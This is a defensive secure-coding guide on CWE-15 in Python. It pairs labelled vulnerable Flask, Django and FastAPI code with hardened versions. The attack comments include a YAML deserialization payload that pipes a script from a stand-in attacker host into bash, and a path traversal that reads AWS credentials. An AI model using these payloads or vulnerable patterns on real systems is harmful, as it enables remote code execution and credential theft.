CWE-15: External Control of System or Configuration Setting - Python
Overview
External control of configuration in Python applications occurs when HTTP request parameters, form data, headers, or query strings are used to directly modify os.environ, application config dictionaries, logging configuration, or framework settings at runtime. Attackers can exploit this to silence security logging, change API endpoints to attacker-controlled servers, enable debug mode (exposing tracebacks and secrets), or alter trust settings.
Common Python Configuration Injection Scenarios:
- os.environ[key] = request.form['value'] — modifies process environment from a request
- app.config[request.args['key']] = request.args['value'] — Flask config poisoning
- logging.getLogger().setLevel(request.args.get('level')) — log level control from request
- setattr(django.conf.settings, key, value) — Django settings mutation
Popular Python Web Frameworks:
- Flask: app.config dictionary
- Django: django.conf.settings module
- FastAPI: Pydantic BaseSettings configuration
Primary Defence: Load all configuration at application startup using Pydantic BaseSettings, Flask Config classes, or Django settings files — all driven from environment variables or config files, never HTTP request parameters. Any runtime configuration endpoint must require admin authorization and constrain values to an explicit allowlist.
Common Vulnerable Patterns
os.environ Modified from Request
# VULNERABLE - Environment variable set from HTTP request
import os
from flask import Flask, request
app = Flask(__name__)
@app.route('/config/env', methods=['POST'])
def set_env():
    key = request.form.get('key')
    value = request.form.get('value')
    os.environ[key] = value  # Attacker sets PATH, PYTHONPATH, DB_URL, etc.
    return "Updated"
# Attack example:
# POST /config/env with key=DISABLE_AUTH&value=1
# Result: If the app reads DISABLE_AUTH anywhere, security can be bypassed
Why this is vulnerable: os.environ modifications affect the entire process. Attackers can override security-related environment variables (database URLs, secret keys, feature flags, external service endpoints) that other parts of the application read at startup or runtime.
Flask app.config Dictionary Poisoning
# VULNERABLE - Arbitrary Flask config key set from request
from flask import Flask, request, jsonify
app = Flask(__name__)
@app.route('/admin/config', methods=['POST'])
def update_config():
    key = request.json.get('key')
    value = request.json.get('value')
    app.config[key] = value  # Attacker sets SECRET_KEY, DEBUG, SESSION_COOKIE_SECURE, etc.
    return jsonify({'status': 'updated'})
# Attack example:
# POST /admin/config {"key": "DEBUG", "value": true}
# Result: Debug mode enabled — full tracebacks with local variables exposed to users
# POST /admin/config {"key": "SECRET_KEY", "value": "known_value"}
# Result: Session tokens can be forged by the attacker
Why this is vulnerable: Flask's app.config contains security-critical settings (SECRET_KEY, DEBUG, TESTING, SESSION_COOKIE_SECURE, SESSION_COOKIE_HTTPONLY). Accepting arbitrary keys means any of these can be overwritten by an attacker with access to this endpoint.
Log Level Set from Request Parameter
# VULNERABLE - Logging level set from query parameter
import logging
from flask import Flask, request
app = Flask(__name__)
@app.route('/debug/log-level')
def set_log_level():
    level = request.args.get('level', 'INFO')
    logging.getLogger().setLevel(level)  # Attacker sets DEBUG or NOTSET
    return f"Log level set to {level}"
# Attack example:
# GET /debug/log-level?level=DEBUG
# Result: Passwords, tokens, PII now written to application logs
# GET /debug/log-level?level=CRITICAL
# Result: All auth failures and access events silenced
Why this is vulnerable: logging.getLogger().setLevel() accepts any recognized level name, so an attacker can choose DEBUG or NOTSET as easily as CRITICAL. Setting DEBUG causes all internal state (including HTTP headers, database query parameters, session tokens) to be logged. Setting a high level such as CRITICAL silences the audit trail entirely.
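The numeric level model explains both attacks: every record below the logger's threshold is dropped, so DEBUG (10) exposes everything while CRITICAL (50) suppresses nearly everything. A short stdlib illustration:

```python
import logging

# Standard level values: lower number = more verbose output
assert logging.DEBUG < logging.INFO < logging.WARNING < logging.ERROR < logging.CRITICAL

logger = logging.getLogger("cwe15.demo")

logger.setLevel("CRITICAL")   # attacker-chosen "quiet" level
assert not logger.isEnabledFor(logging.ERROR)  # auth failures now dropped

logger.setLevel("DEBUG")      # attacker-chosen "verbose" level
assert logger.isEnabledFor(logging.DEBUG)      # sensitive debug records now emitted

# Unrecognized names raise ValueError, but every real level name stays reachable
try:
    logger.setLevel("VERBOSE")
except ValueError:
    pass
```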
Django Settings Mutation at Runtime
# VULNERABLE - Django settings modified via request parameters
from django.conf import settings
from django.http import JsonResponse
def update_settings(request):
    key = request.POST.get('key')
    value = request.POST.get('value')
    setattr(settings, key, value)  # Attacker modifies any Django setting
    return JsonResponse({'status': 'ok'})
# Attack example:
# POST key=ALLOWED_HOSTS&value=*
# Result: Host header attack protections weakened
# POST key=SESSION_COOKIE_HTTPONLY&value=False
# Result: Session cookies accessible via JavaScript (escalates XSS impact)
Why this is vulnerable: Django settings is a global module-level object. Using setattr() with user-controlled key names allows attackers to overwrite any Django security setting including ALLOWED_HOSTS, SECRET_KEY, CSRF_TRUSTED_ORIGINS, and SESSION_COOKIE_SECURE.
Secure Patterns
Pydantic BaseSettings with Validators (PREFERRED)
# SECURE - Immutable startup config validated by Pydantic
from pydantic_settings import BaseSettings
from pydantic import field_validator
from typing import Literal

class AppSettings(BaseSettings):
    log_level: Literal["INFO", "WARN", "ERROR"] = "INFO"
    session_timeout_minutes: int = 30
    allowed_origins: str = "https://example.com"
    debug: bool = False

    @field_validator("session_timeout_minutes")
    @classmethod
    def timeout_range(cls, v):
        if not 1 <= v <= 120:
            raise ValueError("session_timeout_minutes must be between 1 and 120")
        return v

    model_config = {
        "env_file": ".env",
        "frozen": True,  # Immutable after construction
    }

# Loaded once at startup — no HTTP request can change these values
settings = AppSettings()
Why this works: "frozen": True in model_config makes the settings object immutable — any attempt to reassign a field raises a ValidationError. Literal["INFO", "WARN", "ERROR"] acts as a type-enforced allowlist; Pydantic rejects any value not in the literal set at startup. Configuration is loaded only from environment variables and .env files, never from HTTP requests.
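If Pydantic is not available, the same freeze-at-startup idea can be sketched with a stdlib frozen dataclass. The field names mirror the example above; validation moves into __post_init__:

```python
from dataclasses import dataclass, FrozenInstanceError

@dataclass(frozen=True)
class AppSettings:
    log_level: str = "INFO"
    session_timeout_minutes: int = 30

    def __post_init__(self):
        # Allowlist and range checks run once, at construction time
        if self.log_level not in {"INFO", "WARN", "ERROR"}:
            raise ValueError(f"Invalid log_level: {self.log_level}")
        if not 1 <= self.session_timeout_minutes <= 120:
            raise ValueError("session_timeout_minutes must be between 1 and 120")

settings = AppSettings()

# Any later mutation attempt fails loudly instead of silently taking effect
try:
    settings.log_level = "DEBUG"
except FrozenInstanceError:
    pass
```

The important property is the same in both versions: bad values are rejected before the app serves traffic, and nothing can rewrite the object afterwards.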
Allowlist-Validated Runtime Log Level Change (Flask)
# SECURE - Admin-only endpoint with strict allowlist
import logging
from functools import wraps
from flask import Flask, request, jsonify, g
app = Flask(__name__)
ALLOWED_LOG_LEVELS = {"INFO", "WARN", "WARNING", "ERROR"}
def admin_required(f):
    @wraps(f)
    def decorated(*args, **kwargs):
        if not getattr(g, 'user', None) or not g.user.is_admin:
            return jsonify({'error': 'Admin access required'}), 403
        return f(*args, **kwargs)
    return decorated

@app.route('/admin/log-level', methods=['POST'])
@admin_required
def set_log_level():
    level = request.json.get('level', '').upper()
    if level not in ALLOWED_LOG_LEVELS:
        return jsonify({'error': f'Invalid level. Allowed: {sorted(ALLOWED_LOG_LEVELS)}'}), 400
    logging.getLogger().setLevel(level)
    app.logger.info("Log level changed to %s by admin %s", level, g.user.username)
    return jsonify({'status': 'updated', 'level': level})
Why this works: The ALLOWED_LOG_LEVELS set acts as a server-side allowlist — values like DEBUG, NOTSET, or VERBOSE that could expose sensitive data are rejected before reaching setLevel(). The admin_required decorator enforces that only authenticated admin users can reach this endpoint. All changes are audit-logged with the admin's username.
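The normalization-plus-allowlist step can be factored into a pure helper so it is unit-testable without a running Flask app. This is a hypothetical refactoring sketch, not part of the endpoint above:

```python
ALLOWED_LOG_LEVELS = {"INFO", "WARN", "WARNING", "ERROR"}

def normalize_log_level(raw):
    """Return the canonical allowlisted level name, or None if rejected."""
    if not isinstance(raw, str):
        return None
    level = raw.strip().upper()
    return level if level in ALLOWED_LOG_LEVELS else None
```

The endpoint then only has to branch on None versus a canonical name, and the security-relevant decision lives in one easily tested function.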
Enum-Based Configuration Selection (FastAPI)
# SECURE - FastAPI rejects values not in the enum automatically
from enum import Enum
import logging
from fastapi import FastAPI, Depends, HTTPException
from fastapi.security import OAuth2PasswordBearer
app = FastAPI()
oauth2_scheme = OAuth2PasswordBearer(tokenUrl="token")
class LogLevel(str, Enum):
    info = "INFO"
    warn = "WARN"
    error = "ERROR"

def require_admin(token: str = Depends(oauth2_scheme)):
    user = verify_token(token)  # Your token verification logic
    if not user.is_admin:
        raise HTTPException(status_code=403, detail="Admin access required")
    return user

@app.post("/admin/log-level")
def set_log_level(level: LogLevel, admin=Depends(require_admin)):
    # FastAPI returns 422 for any value not in LogLevel before this runs
    logging.getLogger().setLevel(level.value)
    return {"status": "updated", "level": level}
Why this works: FastAPI uses the LogLevel enum for automatic request validation — requests with unlisted values receive 422 Unprocessable Entity before the handler runs. The Depends(require_admin) dependency enforces admin authorization as a prerequisite. The enum definition is the single source of truth for allowed values.
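The enum gate can be exercised directly: constructing the enum from an unlisted value raises ValueError, which is exactly the failure FastAPI's validation layer surfaces as a 422 response.

```python
from enum import Enum

class LogLevel(str, Enum):
    info = "INFO"
    warn = "WARN"
    error = "ERROR"

# Lookup by value is what request validation performs under the hood
assert LogLevel("INFO") is LogLevel.info

# Values outside the enum raise ValueError before any handler code runs
try:
    LogLevel("DEBUG")
    assert False
except ValueError:
    pass
```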
Django Admin Config Endpoint with Allowlist
# SECURE - Django view with allowlist and staff-only auth
import logging
from django.contrib.admin.views.decorators import staff_member_required
from django.http import JsonResponse
from django.views.decorators.http import require_POST
ALLOWED_CONFIG = {
    "log_level": {"INFO", "WARN", "ERROR"},
    "feature_beta": {"true", "false"},
}

@require_POST
@staff_member_required
def update_config(request):
    key = request.POST.get("key", "")
    value = request.POST.get("value", "")
    allowed_values = ALLOWED_CONFIG.get(key)
    if allowed_values is None:
        return JsonResponse({"error": "Unknown configuration key"}, status=400)
    if value not in allowed_values:
        return JsonResponse({"error": f"Invalid value. Allowed: {sorted(allowed_values)}"}, status=400)
    config_service.apply(key, value)  # application-specific config service
    logging.getLogger(__name__).info(
        "Config '%s' changed to '%s' by %s", key, value, request.user.username
    )
    return JsonResponse({"status": "updated"})
Why this works: ALLOWED_CONFIG double-gates input — first validating the key name is a known settable field (preventing modification of undeclared settings like SECRET_KEY), then validating the value against that field's specific set. @staff_member_required blocks non-staff users at the decorator level. @require_POST prevents CSRF-style GET-based config changes.
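The two gates are easy to extract into a pure function for unit testing, independent of Django. A hypothetical sketch mirroring the checks above:

```python
ALLOWED_CONFIG = {
    "log_level": {"INFO", "WARN", "ERROR"},
    "feature_beta": {"true", "false"},
}

def check_config_update(key, value):
    """Return (ok, error_message), applying the key gate then the value gate."""
    allowed_values = ALLOWED_CONFIG.get(key)
    if allowed_values is None:
        return False, "Unknown configuration key"
    if value not in allowed_values:
        return False, f"Invalid value. Allowed: {sorted(allowed_values)}"
    return True, None
```

Keeping the decision logic pure means the "unknown key" and "bad value" rejection paths can both be asserted in fast tests, not just probed through HTTP.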
Testing
Verify the fix by testing:
- Allowlist bypass: Submit a value outside the defined allowlist — expect 400 rejection
- Unknown key injection: Attempt to set SECRET_KEY, DEBUG, or other unlisted keys — expect 400
- Direct os.environ manipulation: Verify no endpoint accepts arbitrary environment variable names
- Authorization bypass: Call config endpoints while unauthenticated or with a non-admin account — expect 401/403
- Django settings mutation: Attempt a setattr(settings, ...) equivalent via any API endpoint — must fail
Untrusted Configuration Sources
A related attack vector occurs when the application loads configuration from a location that untrusted input controls.
Config File Loaded from User-Supplied Path (Vulnerable)
# VULNERABLE - Config file path comes from request parameter
import configparser
from flask import Flask, request
app = Flask(__name__)
@app.route('/admin/load-config', methods=['POST'])
def load_config():
    config_path = request.form.get('path')
    config = configparser.ConfigParser()
    config.read(config_path)  # Attack: path = "../../../home/app/.aws/credentials"
    apply_config(config)
    return 'Loaded'
# Attack example:
# POST /admin/load-config path=../../../home/app/.aws/credentials
# Result: the app user's AWS credentials file (INI format) is parsed and its
#         key=value pairs leak into application config
Why this is vulnerable: configparser.read() silently accepts any path, including ../ traversal sequences. If an attacker can point it at any readable INI-format file (credential files such as ~/.aws/credentials are INI), its contents are parsed as configuration and may override security-sensitive settings.
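The traversal mechanics are easy to see with stdlib path normalization (posixpath is used here so the behavior is identical on any OS):

```python
import posixpath

base = "/var/app/configs"
user_supplied = "../../../home/app/.aws/credentials"

# Naive join + normalization escapes the intended directory entirely
resolved = posixpath.normpath(posixpath.join(base, user_supplied))
assert resolved == "/home/app/.aws/credentials"
assert not resolved.startswith(base)
```

Nothing in configparser performs this check for you; containment must be enforced before the path ever reaches read().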
Config File Loaded from User-Supplied Path (Secure)
# SECURE - Only a fixed set of filenames are accepted; path is never from user input
import configparser
from pathlib import Path
from flask import Flask, request, jsonify, g
from functools import wraps
app = Flask(__name__)
CONFIG_DIR = Path('/var/app/configs').resolve()
ALLOWED_FILENAMES = frozenset({'feature-flags.ini', 'rate-limits.ini'})

def admin_required(f):
    @wraps(f)
    def decorated(*args, **kwargs):
        if not getattr(g, 'user', None) or not g.user.is_admin:
            return jsonify({'error': 'Admin access required'}), 403
        return f(*args, **kwargs)
    return decorated

@app.route('/admin/load-config', methods=['POST'])
@admin_required
def load_config():
    filename = request.form.get('filename', '')
    if filename not in ALLOWED_FILENAMES:
        return jsonify({'error': 'Unknown config file'}), 400
    # Resolve within trusted directory and verify no traversal (Python 3.9+)
    resolved = (CONFIG_DIR / filename).resolve()
    if not resolved.is_relative_to(CONFIG_DIR):
        return jsonify({'error': 'Invalid path'}), 400
    config = configparser.ConfigParser()
    config.read(resolved)
    config_service.apply_allowlisted(config)
    app.logger.info('Config file %s loaded by admin %s', filename, g.user.id)
    return jsonify({'status': 'loaded'})
Why this works: ALLOWED_FILENAMES is an explicit set — any filename not in it is rejected before a path is even constructed. The resolve() + is_relative_to() check provides defence-in-depth against any residual traversal; unlike a plain startswith() prefix check, it does not accept sibling directories such as /var/app/configs-evil. Only known-safe keys from the file are applied, so attacker-crafted file contents cannot introduce unexpected settings.
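One subtlety worth a dedicated test: a plain string startswith() prefix check accepts sibling directories that merely share the prefix, while pathlib's is_relative_to() (Python 3.9+) does not:

```python
from pathlib import PurePosixPath

base = PurePosixPath("/var/app/configs")

inside = PurePosixPath("/var/app/configs/rate-limits.ini")
sibling = PurePosixPath("/var/app/configs-evil/rate-limits.ini")

assert inside.is_relative_to(base)
assert not sibling.is_relative_to(base)

# The naive string prefix check gets the sibling case wrong:
assert str(sibling).startswith(str(base))
```

If is_relative_to() is unavailable, comparing against the base path with a trailing separator appended closes the same gap.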
YAML Config Loaded from Uploaded File (Vulnerable)
# VULNERABLE - Unsafe YAML loading from user-uploaded file
import yaml
from flask import Flask, request
app = Flask(__name__)
@app.route('/admin/upload-config', methods=['POST'])
def upload_config():
    f = request.files.get('config')
    data = yaml.load(f.read(), Loader=yaml.Loader)  # UNSAFE - allows arbitrary Python object creation
    apply_config(data)
    return 'Applied'
# Attack: upload a YAML file containing:
# !!python/object/apply:os.system ['curl http://attacker.com/shell | bash']
# Result: Remote code execution during yaml.load()
Why this is vulnerable: yaml.load() with yaml.Loader (or no Loader) deserializes arbitrary Python objects, including calls to os.system, subprocess.Popen, and eval. An attacker who can upload a YAML file achieves remote code execution.
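The difference between the two loaders can be demonstrated directly (requires PyYAML; a harmless os.getcwd tag stands in for a real payload):

```python
import yaml

malicious = "!!python/object/apply:os.getcwd []"

# safe_load refuses the Python object tag outright
try:
    yaml.safe_load(malicious)
    raised = False
except yaml.YAMLError:
    raised = True
assert raised

# Plain scalars and mappings load fine
assert yaml.safe_load("log_level: INFO") == {"log_level": "INFO"}
```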
YAML Config Loaded from Uploaded File (Secure)
# SECURE - Use safe_load and validate the resulting structure
import yaml
from jsonschema import validate, ValidationError
from flask import request, jsonify, g
CONFIG_SCHEMA = {
    'type': 'object',
    'additionalProperties': False,
    'properties': {
        'log_level': {'type': 'string', 'enum': ['INFO', 'WARN', 'ERROR']},
        'timeout_sec': {'type': 'integer', 'minimum': 1, 'maximum': 120},
    }
}

@app.route('/admin/upload-config', methods=['POST'])
@admin_required
def upload_config():
    f = request.files.get('config')
    if not f:
        return jsonify({'error': 'No file provided'}), 400
    try:
        # safe_load only handles basic YAML types — no Python object tags
        data = yaml.safe_load(f.read())
    except yaml.YAMLError as exc:
        return jsonify({'error': f'Invalid YAML: {exc}'}), 400
    try:
        validate(instance=data, schema=CONFIG_SCHEMA)
    except ValidationError as exc:
        return jsonify({'error': f'Schema violation: {exc.message}'}), 400
    config_service.apply(data)
    app.logger.info('Config uploaded by admin %s', g.user.id)
    return jsonify({'status': 'applied'})
Why this works: yaml.safe_load() only produces standard Python types (dicts, lists, strings, numbers) — it refuses to deserialize Python object tags, preventing code execution. The JSON Schema validates that only the expected keys with expected types and value ranges are present; unexpected keys are rejected by additionalProperties: False.